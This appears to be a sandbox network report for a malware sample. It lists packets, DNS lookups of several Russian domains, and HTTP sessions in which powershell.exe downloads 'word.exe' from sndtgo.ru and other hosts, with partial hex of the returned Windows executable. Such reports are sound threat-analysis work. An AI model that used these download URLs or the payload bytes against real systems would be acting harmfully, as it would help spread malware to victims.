Mar 21, 2019 14:01:27.977533102 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.977531910 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.977555037 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.977575064 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.977595091 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.977616072 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.977636099 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.977655888 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.977669954 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.977677107 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.979104996 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.980025053 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:28.038058043 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.038114071 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.038172960 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.038242102 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.038288116 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.038336039 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.038341045 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:28.038382053 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.038430929 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.038467884 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.038511992 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:28.038516045 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.038542032 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.038579941 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.038631916 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.038635015 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:28.038701057 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.038758039 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.038790941 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:28.038796902 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.038830996 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.038857937 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.038892031 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:28.038902998 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.038970947 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.038995028 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:28.039015055 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.039041042 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.039066076 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.039088011 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:28.039092064 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.039117098 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.039139986 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.039160013 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.039180994 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.039201975 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.039210081 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:28.039222956 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.039243937 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.039263964 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.039285898 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.039308071 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.039313078 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:28.039328098 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.039347887 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.039367914 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.039388895 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.039412975 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.039426088 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:28.039434910 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.039455891 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.039475918 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.039495945 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.039516926 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.039539099 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.039561033 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.039572001 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:28.039583921 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.039608002 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.039630890 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.039654016 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.039679050 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.039684057 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:28.039704084 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.039730072 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.039752007 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.039791107 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:28.101541996 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.101594925 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.101615906 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.101636887 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.101656914 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.101680994 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.101701021 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.101723909 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.101746082 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.101768017 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.101789951 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.101810932 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.101824045 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:28.101833105 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.101855040 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.101872921 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:28.102031946 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:28.853705883 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:28.854156971 CET	49225	80	192.168.1.16	90.156.201.98
Mar 21, 2019 14:02:48.134784937 CET	49792	53	192.168.1.16	8.8.8.8
Mar 21, 2019 14:02:48.288427114 CET	53	49792	8.8.8.8	192.168.1.16
Mar 21, 2019 14:02:49.082967997 CET	50672	53	192.168.1.16	8.8.8.8
Mar 21, 2019 14:02:49.095386028 CET	53	50672	8.8.8.8	192.168.1.16
Mar 21, 2019 14:02:49.097779989 CET	54414	53	192.168.1.16	8.8.8.8
Mar 21, 2019 14:02:49.109786987 CET	53	54414	8.8.8.8	192.168.1.16
Mar 21, 2019 14:02:49.513041973 CET	61734	53	192.168.1.16	8.8.8.8
Mar 21, 2019 14:02:49.525126934 CET	53	61734	8.8.8.8	192.168.1.16
Mar 21, 2019 14:02:49.527518988 CET	55067	53	192.168.1.16	8.8.8.8
Mar 21, 2019 14:02:49.539441109 CET	53	55067	8.8.8.8	192.168.1.16

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 21, 2019 14:01:25.765724897 CET	51176	53	192.168.1.16	8.8.8.8
Mar 21, 2019 14:01:25.880289078 CET	53	51176	8.8.8.8	192.168.1.16
Mar 21, 2019 14:01:26.521301031 CET	49810	53	192.168.1.16	8.8.8.8
Mar 21, 2019 14:01:26.600132942 CET	53	49810	8.8.8.8	192.168.1.16
Mar 21, 2019 14:01:26.740336895 CET	55151	53	192.168.1.16	8.8.8.8
Mar 21, 2019 14:01:26.808345079 CET	53	55151	8.8.8.8	192.168.1.16
Mar 21, 2019 14:01:27.088644028 CET	53216	53	192.168.1.16	8.8.8.8
Mar 21, 2019 14:01:27.116884947 CET	53	53216	8.8.8.8	192.168.1.16
Mar 21, 2019 14:02:48.134784937 CET	49792	53	192.168.1.16	8.8.8.8
Mar 21, 2019 14:02:48.288427114 CET	53	49792	8.8.8.8	192.168.1.16
Mar 21, 2019 14:02:49.082967997 CET	50672	53	192.168.1.16	8.8.8.8
Mar 21, 2019 14:02:49.095386028 CET	53	50672	8.8.8.8	192.168.1.16
Mar 21, 2019 14:02:49.097779989 CET	54414	53	192.168.1.16	8.8.8.8
Mar 21, 2019 14:02:49.109786987 CET	53	54414	8.8.8.8	192.168.1.16
Mar 21, 2019 14:02:49.513041973 CET	61734	53	192.168.1.16	8.8.8.8
Mar 21, 2019 14:02:49.525126934 CET	53	61734	8.8.8.8	192.168.1.16
Mar 21, 2019 14:02:49.527518988 CET	55067	53	192.168.1.16	8.8.8.8
Mar 21, 2019 14:02:49.539441109 CET	53	55067	8.8.8.8	192.168.1.16

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Mar 21, 2019 14:01:25.765724897 CET	192.168.1.16	8.8.8.8	0x5309	Standard query (0)	starstyl.ru	A (IP address)	IN (0x0001)
Mar 21, 2019 14:01:26.521301031 CET	192.168.1.16	8.8.8.8	0x8c65	Standard query (0)	prostor-rybalka.ru	A (IP address)	IN (0x0001)
Mar 21, 2019 14:01:26.740336895 CET	192.168.1.16	8.8.8.8	0x176c	Standard query (0)	jewemsk.ru	A (IP address)	IN (0x0001)
Mar 21, 2019 14:01:27.088644028 CET	192.168.1.16	8.8.8.8	0xf8ec	Standard query (0)	sndtgo.ru	A (IP address)	IN (0x0001)
Mar 21, 2019 14:02:48.134784937 CET	192.168.1.16	8.8.8.8	0xa23a	Standard query (0)	www.kakaocorp.link	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Mar 21, 2019 14:01:25.880289078 CET	8.8.8.8	192.168.1.16	0x5309	No error (0)	starstyl.ru	92.53.98.31	A (IP address)	IN (0x0001)
Mar 21, 2019 14:01:26.600132942 CET	8.8.8.8	192.168.1.16	0x8c65	No error (0)	prostor-rybalka.ru	90.156.201.98	A (IP address)	IN (0x0001)
Mar 21, 2019 14:01:26.600132942 CET	8.8.8.8	192.168.1.16	0x8c65	No error (0)	prostor-rybalka.ru	90.156.201.84	A (IP address)	IN (0x0001)
Mar 21, 2019 14:01:26.600132942 CET	8.8.8.8	192.168.1.16	0x8c65	No error (0)	prostor-rybalka.ru	90.156.201.47	A (IP address)	IN (0x0001)
Mar 21, 2019 14:01:26.600132942 CET	8.8.8.8	192.168.1.16	0x8c65	No error (0)	prostor-rybalka.ru	90.156.201.35	A (IP address)	IN (0x0001)
Mar 21, 2019 14:01:26.808345079 CET	8.8.8.8	192.168.1.16	0x176c	No error (0)	jewemsk.ru	92.53.96.93	A (IP address)	IN (0x0001)
Mar 21, 2019 14:01:27.116884947 CET	8.8.8.8	192.168.1.16	0xf8ec	No error (0)	sndtgo.ru	78.155.218.207	A (IP address)	IN (0x0001)
Mar 21, 2019 14:02:48.288427114 CET	8.8.8.8	192.168.1.16	0xa23a	No error (0)	www.kakaocorp.link	107.173.49.208	A (IP address)	IN (0x0001)
Mar 21, 2019 14:02:49.525126934 CET	8.8.8.8	192.168.1.16	0x41a4	No error (0)	a767.dscg3.akamai.net	88.221.144.97	A (IP address)	IN (0x0001)
Mar 21, 2019 14:02:49.525126934 CET	8.8.8.8	192.168.1.16	0x41a4	No error (0)	a767.dscg3.akamai.net	88.221.144.121	A (IP address)	IN (0x0001)
Mar 21, 2019 14:02:49.539441109 CET	8.8.8.8	192.168.1.16	0xc257	No error (0)	a767.dscg3.akamai.net	88.221.144.97	A (IP address)	IN (0x0001)
Mar 21, 2019 14:02:49.539441109 CET	8.8.8.8	192.168.1.16	0xc257	No error (0)	a767.dscg3.akamai.net	88.221.144.121	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

prostor-rybalka.ru

sndtgo.ru

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.1.16	49225	90.156.201.98	80	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Mar 21, 2019 14:01:26.661782980 CET	1	OUT	GET /assets/plugins/managermanager/widgets/colors/word.exe HTTP/1.1 Host: prostor-rybalka.ru Connection: Keep-Alive
Mar 21, 2019 14:01:26.716404915 CET	2	IN	HTTP/1.1 503 Service Temporarily Unavailable Date: Thu, 21 Mar 2019 13:01:26 GMT Content-Type: text/html Content-Length: 5229 Connection: keep-alive Keep-Alive: timeout=5 Server: openresty ETag: "5bbf097e-146d" Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 5b 2e 6d 5d 20 6d 61 73 74 65 72 68 6f 73 74 20 2d 20 d0 bf d1 80 d0 be d1 84 d0 b5 d1 81 d1 81 d0 b8 d0 be d0 bd d0 b0 d0 bb d1 8c d0 bd d1 8b d0 b9 20 d1 85 d0 be d1 81 d1 82 d0 b8 d0 bd d0 b3 20 d1 81 d0 b0 d0 b9 d1 82 d0 b0 3c 21 2d 2d 23 65 63 68 6f 20 76 61 72 3d 22 44 4f 4d 41 49 4e 22 2d 2d 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 63 6f 6e 74 65 6e 74 3d 22 6e 6f 6e 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 68 72 65 66 3d 22 2f 66 69 6c 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 61 73 74 65 72 68 6f 73 74 2e 72 75 2f 22 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 66 69 6c 65 73 2f 6c 6f 67 6f 2e 70 6e 67 22 61 6c 74 3d 22 22 3e 20 3c 2f 61 3e 3c 61 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 70 2e 6d 61 73 74 65 72 68 6f 73 74 2e 72 75 2f 22 63 6c 61 73 73 3d 22 73 69 67 6e 22 3e d0 92 d0 be d0 b9 d1 82 d0 b8 20 d0 b2 20 d0 bb d0 b8 d1 87 d0 bd d1 8b d0 b9 20 d0 ba d0 b0 d0 b1 d0 b8 d0 bd d0 b5 d1 82 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 68 31 3e d0 98 d0 b7 d0 b2 d0 b8 d0 bd d0 b8 d1 82 d0 b5 2c 20 d0 bd d0 be 20 d1 8d d1 82 d0 be d1 82 20 d1 81 d0 b0 d0 b9 d1 82 20 d0 b8 d0 bb d0 b8 20 d0 b5 d0 b3 d0 be 20 d1 81 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d1 81 d0 b5 d0 b9 d1 87 d0 b0 d1 81 20 d0 be d1 82 d0 ba d0 bb d1 8e d1 87 d0 b5 d0 bd d1 8b 2e 3c 2f 68 31 3e 3c 70 20 63 6c 61 73 73 3d 22 67 72 65 79 22 3e d0 9e 20 d0 bf d1 80 d0 b8 d1 87 d0 b8 d0 bd d0 b0 d1 85 20 d0 bd d0 b5 d1 80 d0 b0 d0 b1 d0 be d1 82 d0 be d1 81 d0 bf d0 be d1 81 d0 be d0 b1 d0 bd d0 be d1 81 d1 82 d0 b8 20 d1 81 d0 b0 d0 b9 d1 82 d0 b0 20 d0 92 d1 8b 20 d0 bc d0 be Data Ascii: <!doctype html><html lang="ru"><head><title>[.m] masterhost - ...#echo var="DOMAIN"--></title><meta charset="utf-8"><meta name="robots"content="none"><meta name="viewport"content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><link rel="stylesheet"href="/files/style.css"></head><body><div class="wrapper"><div class="header"><div class="container"><div class="row"><div class="col"><a href="https://masterhost.ru/"class="logo"><img src="/files/logo.png"alt=""> </a><a rel="nofollow"href="https://cp.masterhost.ru/"class="sign"> </a></div></div></div></div><div class="main"><div class="container"><div class="row"><div class="col"><div class="content"><h1>, .</h1><p class="grey">
Mar 21, 2019 14:01:26.716425896 CET	4	IN	Data Raw: d0 b6 d0 b5 d1 82 d0 b5 20 d1 83 d1 82 d0 be d1 87 d0 bd d0 b8 d1 82 d1 8c 20 d1 83 20 d0 b0 d0 b4 d0 bc d0 b8 d0 bd d0 b8 d1 81 d1 82 d1 80 d0 b0 d1 86 d0 b8 d0 b8 20 e2 80 93 20 d1 85 d0 be d1 81 d1 82 d0 b8 d0 bd d0 b3 2d d0 bf d1 80 d0 be d0 Data Ascii: - <strong class="mh">.masterhost</strong>, ,
Mar 21, 2019 14:01:26.716445923 CET	5	IN	Data Raw: d0 b0 d1 80 d0 b8 d1 84 d1 8b 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 61 73 74 65 72 68 6f 73 74 2e 72 75 2f 73 65 72 76 69 63 65 2f 68 6f 73 74 69 6e 67 2f 23 70 72 6f 66 65 73 73 69 6f 6e 61 Data Ascii: </a></li><li><a href="https://masterhost.ru/service/hosting/#professional"> </a></li><li><a href="https://masterhost.ru/service/hosting/constructor/"></a></li><li>
Mar 21, 2019 14:01:26.716465950 CET	6	IN	Data Raw: 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 6e 61 76 3e 3c 6e 61 76 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 6e 61 76 22 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 61 73 74 65 72 68 6f 73 74 2e 72 75 2f 73 65 72 76 69 63 65 2f 68 Data Ascii: ></li></ul></nav><nav><ul class="nav"><li><a href="https://masterhost.ru/service/hardware/rent/"></a><ul><li><a href="https://masterhost.ru/service/hardware/rent/#smart-server"> (Dedicated)</a></li><li><a href="https:
Mar 21, 2019 14:01:26.716480970 CET	7	IN	Data Raw: b8 d0 b8 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 61 73 74 65 72 68 6f 73 74 2e 72 75 2f 73 65 72 76 69 63 65 2f 73 73 6c 2f 23 65 76 22 3e 53 53 4c 20 d1 81 26 6e 62 73 70 3b d1 80 d0 b0 d1 81 Data Ascii: </a></li><li><a href="https://masterhost.ru/service/ssl/#ev">SSL   </a></li></ul></li></ul></nav></div></div></div></div></div></div><div class="footer"><div class="container"><div class="row">

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.1.16	49228	78.155.218.207	80	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Mar 21, 2019 14:01:27.183000088 CET	8	OUT	GET /word.exe HTTP/1.1 Host: sndtgo.ru Connection: Keep-Alive
Mar 21, 2019 14:01:27.243279934 CET	10	IN	HTTP/1.1 200 OK Server: nginx/1.2.1 Date: Thu, 21 Mar 2019 13:01:22 GMT Content-Type: application/octet-stream Content-Length: 548352 Last-Modified: Mon, 18 Mar 2019 17:47:26 GMT Connection: keep-alive Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1b cc d3 bd 3e 03 9d 4e 2f 59 31 5a b9 af 94 d7 8c ca 5f c1 6a 74 e7 ae 14 1f 50 39 93 93 07 c7 c9 6b 11 c9 60 44 db 44 80 ec 64 e3 f4 9a 50 b7 d6 5d 3b b7 f4 9c 7e 0e 26 07 2a e9 a6 98 13 c0 45 f2 c5 a7 79 8e 51 1f bd 85 3a 0a a0 1b 7a 12 c1 8c b2 6e 21 dc 31 07 85 7e 3e 50 d9 94 1c e9 45 7e 3d 4c 9b 83 2c 9a de e6 ac 71 de be 8b b6 5b cd 4c de d0 cc 07 4c 22 9c 14 f4 d4 c7 0f f6 50 45 00 00 4c 01 06 00 1e b1 8f 5c 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0e 00 00 52 03 00 00 08 05 00 00 00 00 00 7d 5a 01 00 00 10 00 00 00 70 03 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 08 00 00 04 00 00 16 d7 08 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 86 04 00 04 01 00 00 00 20 05 00 04 a2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 57 04 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cc 57 04 00 18 00 00 00 70 57 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 03 00 68 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 bf 51 03 00 00 10 00 00 00 52 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 74 24 01 00 00 70 03 00 00 26 01 00 00 56 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d4 42 00 00 00 a0 04 00 00 28 00 00 00 7c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 a1 13 00 00 00 f0 04 00 00 14 00 00 00 a4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 66 69 64 73 00 00 e8 01 00 00 00 10 05 00 00 02 00 00 00 b8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 04 a2 03 00 00 20 05 00 00 a4 03 00 00 ba 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$>N/Y1Z_jtP9k`DDdP];~&*EyQ:zn!1~>PE~=L,q[LL"PEL\R}Zp@ WpWpW@ph.textQR `.rdatat$p&V@@.dataB(\|@.tls@.gfids@@.rsrc @@
Mar 21, 2019 14:01:27.243302107 CET	11	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 51 6a 01 e8 b0 2d 01 00 68 b0 c7 44 00 a3 b4 c7 44 00 e8 49 29 00 00 68 b0 c7 44 00 Data Ascii: Qj-hDDI)hDDJ*$DD4$hh{vChLvChp_CRBQjP-hDD(hDD)$DD4$hhvChvCbh_CA
Mar 21, 2019 14:01:27.243324041 CET	12	IN	Data Raw: 14 85 c9 79 06 83 c8 ff c2 10 00 33 c0 85 c9 0f 95 c0 c2 10 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 8b 5c 24 10 8b c3 55 8b 6c 24 10 56 8b 74 24 10 c7 46 14 0f 00 00 00 c7 46 10 00 00 00 00 c6 06 00 2b c5 74 6f 83 c1 08 89 4c 24 10 57 66 Data Ascii: y3S\$Ul$Vt$FF+toL$WfN;wF~r+jPFr~rt$:SUPQ$;Fvu_N;w%F~r^][^][+jPs^
Mar 21, 2019 14:01:27.243345022 CET	13	IN	Data Raw: ff 52 08 8b c3 8b 4d f4 64 89 0d 00 00 00 00 5f 5e 5b 8b e5 5d c3 6a 00 6a 00 e8 3e 53 01 00 cc 55 8b ec 6a ff 68 60 5b 43 00 64 a1 00 00 00 00 50 64 89 25 00 00 00 00 83 ec 20 53 56 57 89 65 f0 33 db 89 5d ec 8b 45 0c 38 18 75 04 33 d2 eb 0e 8b Data Ascii: RMd_^[]jj>SUjh`[CdPd% SVWe3]E8u3JBu+UM@t \|$\|t\|;v+WfE}uMT8tPM@9\uD<t;tM@9\tE@D
